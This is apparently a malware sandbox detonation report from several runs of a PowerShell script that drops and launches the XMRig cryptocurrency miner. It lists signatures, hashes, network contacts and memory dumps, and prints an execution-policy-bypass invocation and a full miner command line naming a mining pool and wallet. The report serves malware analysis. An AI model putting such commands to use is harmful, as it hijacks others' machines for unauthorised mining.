| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3484 wrote to memory of 1640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3484 wrote to memory of 1640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.189.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/3484-3-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp
memory/3484-5-0x0000023B56790000-0x0000023B567B2000-memory.dmp
memory/3484-8-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-9-0x0000023B56940000-0x0000023B569B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w45xar5h.3fh.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3484-20-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-25-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/3484-48-0x0000023B56AC0000-0x0000023B56AD2000-memory.dmp
memory/3484-61-0x0000023B56920000-0x0000023B5692A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1640-90-0x0000023768050000-0x0000023768070000-memory.dmp
memory/1640-91-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/3484-93-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/1640-92-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/3484-94-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp
memory/3484-95-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp
memory/1640-96-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-97-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-98-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-99-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-100-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-101-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-102-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-103-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-104-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-105-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-106-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-107-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-108-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-109-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-110-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-111-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-112-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-113-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-114-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-115-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-116-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-117-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-118-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-119-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-120-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-121-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-122-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-123-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-124-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-125-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-126-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-127-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-128-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-129-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-130-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-131-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-132-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-133-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-134-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-135-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-136-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-137-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-138-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-139-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-140-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-141-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-142-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-143-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-144-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-145-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-146-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-147-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-148-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-149-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-150-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-151-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-152-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-153-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-154-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-155-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
memory/1640-156-0x00007FF67C690000-0x00007FF67D2C3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:39
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2856 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2856 wrote to memory of 1380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2856-2-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp
memory/2856-5-0x000001A21F600000-0x000001A21F622000-memory.dmp
memory/2856-8-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/2856-9-0x000001A21F7B0000-0x000001A21F826000-memory.dmp
memory/2856-10-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ib5505kl.zeq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2856-25-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/2856-48-0x000001A21F5D0000-0x000001A21F5E2000-memory.dmp
memory/2856-61-0x000001A207100000-0x000001A20710A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1380-90-0x000002E2FC8B0000-0x000002E2FC8D0000-memory.dmp
memory/1380-91-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/2856-92-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp
memory/1380-93-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/2856-94-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp
memory/1380-95-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-96-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-97-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-98-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-99-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-100-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-101-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-102-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-103-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-104-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-105-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-106-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-107-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-108-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-109-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-110-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-111-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-112-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-113-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-114-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-115-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-116-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-117-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-118-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-119-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-120-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-121-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-122-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-123-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-124-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-125-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-126-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-127-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-128-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-129-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-130-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-131-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-132-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-133-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-134-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-135-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-136-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-137-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-138-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-139-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-140-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-141-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-142-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-143-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-144-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-145-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-146-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-147-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-148-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-149-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-150-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-151-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-152-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-153-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-154-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
memory/1380-155-0x00007FF72F260000-0x00007FF72FE93000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:17
Platform
win10v2004-20240426-en
Max time kernel
1788s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5112 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5112 wrote to memory of 2640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
